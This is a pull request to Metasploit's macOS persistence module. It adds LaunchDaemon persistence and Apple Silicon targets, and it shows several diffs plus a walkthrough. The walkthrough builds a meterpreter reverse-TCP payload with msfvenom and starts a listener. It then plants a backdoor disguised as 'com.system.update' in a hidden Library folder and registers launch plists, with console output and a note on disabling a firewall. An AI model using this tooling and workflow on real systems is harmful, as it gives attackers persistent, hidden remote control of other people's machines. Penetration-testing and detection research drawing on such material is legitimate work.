### PR TITLE
Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb

### DIFF
--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local
                   [true, 'Continually restart the payload exe if it crashes/exits.', true]),
       OptBool.new('RUN_NOW',
                   [false, 'Run the installed payload immediately.', false]),
-      OptEnum.new('LAUNCH_ITEM', [false, 'Type of launch item, see description for more info. Default is LaunchAgent', 'LaunchAgent', %w[LaunchAgent LaunchDaemon]])
+      OptEnum.new('LAUNCH_ITEM', [true, 'Type of launch item, see description for more info. Default is LaunchAgent', 'LaunchAgent', %w[LaunchAgent LaunchDaemon]])
     ])
   end
 

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local
       OptBool.new('RUN_NOW',
         [false, 'Run the installed payload immediately.', false]
       ),
-      OptEnum.new('LAUNCH_ITEM', [false, 'Type of launch item, see description for more info. Default is LaunchAgent'], ['LaunchAgent', 'LaunchDaemon'])
+      OptEnum.new('LAUNCH_ITEM', [false, 'Type of launch item, see description for more info. Default is LaunchAgent', 'LaunchAgent', %w[LaunchAgent LaunchDaemon]])
     ])
   end
 

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -35,7 +35,11 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultTarget' => 0,
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'DisclosureDate' => '2012-04-01',
-        'Platform' => [ 'osx', 'python', 'unix' ]
+        'Platform' => [ 'osx', 'python', 'unix' ],
+        'References' => [
+          'https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf',
+          'https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html'
+        ]
       )
     )
 

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Targets' => [
           [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
           [ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
+          ['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }]
           [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
           [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
         ],

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Targets' => [
           [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
           [ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
-          ['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }]
+          ['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
           [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
           [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
         ],
@@ -155,7 +155,6 @@ class MetasploitModule < Msf::Exploit::Local
   # @return [String] path to the LaunchAgent service
   def plist_path
       @plist ||= "/Users/#{user}/Library/#{datastore['LAUNCH_ITEM']}s/#{File.basename(backdoor_path)}.plist"
-      puts "@plist = #{plist_path}"
   end
 
   # @return [Boolean] user wants to launch the LaunchAgent immediately

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -19,17 +19,17 @@ class MetasploitModule < Msf::Exploit::Local
         'Name' => 'Mac OS X Persistent Payload Installer',
         'Description' => %q{
           This module provides a persistent boot payload by creating a launch item, which can be
-          a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered 
+          a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered
           upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with
           elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.
-          In either case the plist entry specifies an executable that will be run before or at login. 
+          In either case the plist entry specifies an executable that will be run before or at login.
         },
         'License' => MSF_LICENSE,
         'Author' => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", 'joev' ],
         'Targets' => [
           [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
           [ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
-          ['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
+          ['Mac OS X Apple Sillicon', { 'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
           [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
           [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
         ],
@@ -46,15 +46,14 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptString.new('BACKDOOR_PATH',
-        [true, 'Path to hide the backdoor on the target.',
-         '~/Library/.<random>/com.system.update']
-      ),
+                    [
+                      true, 'Path to hide the backdoor on the target.',
+                      '~/Library/.<random>/com.system.update'
+                    ]),
       OptBool.new('KEEPALIVE',
-        [true, 'Continually restart the payload exe if it crashes/exits.', true]
-      ),
+                  [true, 'Continually restart the payload exe if it crashes/exits.', true]),
       OptBool.new('RUN_NOW',
-        [false, 'Run the installed payload immediately.', false]
-      ),
+                  [false, 'Run the installed payload immediately.', false]),
       OptEnum.new('LAUNCH_ITEM', [false, 'Type of launch item, see description for more info. Default is LaunchAgent', 'LaunchAgent', %w[LaunchAgent LaunchDaemon]])
     ])
   end
@@ -84,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Local
   def add_launchctl_item
     label = File.basename(backdoor_path)
     cmd_exec("mkdir -p #{File.dirname(plist_path).shellescape}")
-    # Note: the OnDemand key is the OSX < 10.4 equivalent of KeepAlive
+    # NOTE: the OnDemand key is the OSX < 10.4 equivalent of KeepAlive
     item = <<-EOI
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@@ -124,9 +123,9 @@ class MetasploitModule < Msf::Exploit::Local
   # path to upload the backdoor. any <user> or <random> substrings will be replaced.
   # @return [String] path to drop the backdoor payload.
   def backdoor_path
-    @backdoor_path ||= (datastore['BACKDOOR_PATH']
-      .gsub('<random>'){ Rex::Text.rand_text_alpha(8) }
-      .gsub(/^~\//, "/Users/#{user}/"))
+    @backdoor_path ||= datastore['BACKDOOR_PATH']
+                       .gsub('<random>') { Rex::Text.rand_text_alpha(8) }
+                       .gsub(%r{^~/}, "/Users/#{user}/")
   end
 
   # raises an error if a Launch Agent already exists at desired same plist_path
@@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Local
   # path to the LaunchAgent service configuration plist
   # @return [String] path to the LaunchAgent service
   def plist_path
-      @plist ||= "/Users/#{user}/Library/#{datastore['LAUNCH_ITEM']}s/#{File.basename(backdoor_path)}.plist"
+    @plist_path ||= "/Users/#{user}/Library/#{datastore['LAUNCH_ITEM']}s/#{File.basename(backdoor_path)}.plist"
   end
 
   # @return [Boolean] user wants to launch the LaunchAgent immediately

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local
       OptBool.new('RUN_NOW',
         [false, 'Run the installed payload immediately.', false]
       ),
-      OptEnum.new('LAUNCH_TYPE', [false, 'Launch Type, default is LaunchAgent'], ['LaunchAgent', 'LaunchDaemon'])
+      OptEnum.new('LAUNCH_ITEM', [false, 'Type of launch item, see description for more info. Default is LaunchAgent'], ['LaunchAgent', 'LaunchDaemon'])
     ])
   end
 
@@ -153,7 +153,8 @@ class MetasploitModule < Msf::Exploit::Local
   # path to the LaunchAgent service configuration plist
   # @return [String] path to the LaunchAgent service
   def plist_path
-    @plist ||= "/Users/#{user}/Library/LaunchAgents/#{File.basename(backdoor_path)}.plist"
+      @plist ||= "/Users/#{user}/Library/#{datastore['LAUNCH_ITEM']}s/#{File.basename(backdoor_path)}.plist"
+      puts "@plist = #{plist_path}"
   end
 
   # @return [Boolean] user wants to launch the LaunchAgent immediately

--- a/modules/exploits/osx/local/persistence.rb
+++ b/modules/exploits/osx/local/persistence.rb
@@ -18,9 +18,11 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Mac OS X Persistent Payload Installer',
         'Description' => %q{
-          This module provides a persistent boot payload by creating a plist entry
-          in current user's ~/Library/LaunchAgents directory. Whenever the user logs in,
-          the LaunchAgent will be invoked and this dropped payload will run.
+          This module provides a persistent boot payload by creating a launch item, which can be
+          a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered 
+          upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with
+          elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.
+          In either case the plist entry specifies an executable that will be run before or at login. 
         },
         'License' => MSF_LICENSE,
         'Author' => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", 'joev' ],
@@ -47,7 +49,8 @@ class MetasploitModule < Msf::Exploit::Local
       ),
       OptBool.new('RUN_NOW',
         [false, 'Run the installed payload immediately.', false]
-      )
+      ),
+      OptEnum.new('LAUNCH_TYPE', [false, 'Launch Type, default is LaunchAgent'], ['LaunchAgent', 'LaunchDaemon'])
     ])
   end
 


### PR DESCRIPTION
According to [The Art of Mac Malware](https://taomm.org/) Launch Items are able to persist as LaunchAgents or LaunchDaemons, this pull request adds LaunchDaemon persistence to `exploits/osx/local/persistence.rb` by writing a plist file to `~/Library/LaunchDaemons`. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally this pull request adds the ability for the module to target Apple Silicon devices.

As part of the testing I used [BlockBlock](https://objective-see.org/products/blockblock.html) to catch the plist entry being written. Note if you're using something like [LuLu](https://objective-see.org/products/lulu.html) it needs to be turned off as it will catch and terminate meterpreter/shell connections.

I've tested both LaunchAgent and LaunchDaemon persistence with this module on an Apple Silicon device.
`$ uname -a
Darwin corey.local 23.1.0 Darwin Kernel Version 23.1.0: Mon Oct  9 21:28:12 PDT 2023; root:xnu-10002.41.9~6/RELEASE_ARM64_T8103 arm64
`

We start by generating a meterpreter:

```
$ ../metasploit-framework/msfvenom -p osx/aarch64/meterpreter_reverse_tcp  LHOST=192.168.0.239 LPORT=4444 -o payload -f macho
[-] No platform was selected, choosing Msf::Module::Platform::OSX from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 813091 bytes
Final size of macho file: 813091 bytes
Saved as: payload
```

Start a listener and reload the module:

```
msf6> reload_all
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.239
lhost => 192.168.0.239
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload osx/aarch64/meterpreter/reverse_tcp
payload => osx/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
```

Run the meterpreter -> `10:48:22 ~/Desktop $ chmod +x payload && ./payload`

background the session and start to configure the options for `persistence.rb`
```
meterpreter> bg
msf6 exploit(multi/handler) > search osx persistence

msf6 exploit(multi/handler) > use 0
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/local/persistence) > set target 3
target => 3
msf6 exploit(osx/local/persistence) > set session 2
session => 2
msf6 exploit(osx/local/persistence) > set payload osx/aarch64/meterpreter_reverse_tcp 
payload => osx/aarch64/meterpreter_reverse_tcp
msf6 exploit(osx/local/persistence) > set lhost 192.168.0.239
lhost => 192.168.0.239
smsf6 exploit(osx/local/persistence) > set lport 1234
lport => 1234
```

Test w LaunchAgent, note that exploit doesn't technically "complete" because RUN_NOW is false. The plist entry and executable are dropped on the system though as shown by the pictures below.

```
msf6 exploit(osx/local/persistence) > run
[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.vRzmesOZ/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.vRzmesOZ ; rm /Users/corery/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.

```
<img width="332" alt="Screenshot 2024-08-02 at 12 13 57 PM" src="https://github.com/user-attachments/assets/e42bd55b-5b08-48b2-970e-d30c4d02312c">
<img width="1398" alt="Screenshot 2024-08-02 at 12 14 06 PM" src="https://github.com/user-attachments/assets/82e47ae3-6d0f-4f57-b5b1-c35ee8b06ff0">
<img width="803" alt="Screenshot 2024-08-02 at 12 12 43 PM" src="https://github.com/user-attachments/assets/206544ab-dc3b-46d9-9c81-09bc5b05bc45">

Now we test LaunchDaemons by setting `LaunchItem':

```
msf6 exploit(osx/local/persistence) > set LAUNCH_ITEM LaunchDaemon
LAUNCH_ITEM => LaunchDaemon
msf6 exploit(osx/local/persistence) > run

[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.hsKpBATL/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchDaemons/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.hsKpBATL ; rm /Users/corery/Library/LaunchDaemons/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.
```

<img width="1429" alt="Screenshot 2024-08-02 at 12 18 19 PM" src="https://github.com/user-attachments/assets/0d0ca5b9-ad65-410a-8b5b-a0ad9c8701f4">
<img width="742" alt="Screenshot 2024-08-02 at 12 17 17 PM" src="https://github.com/user-attachments/assets/9846c236-0e38-4a95-9dca-1f57e4008e81">



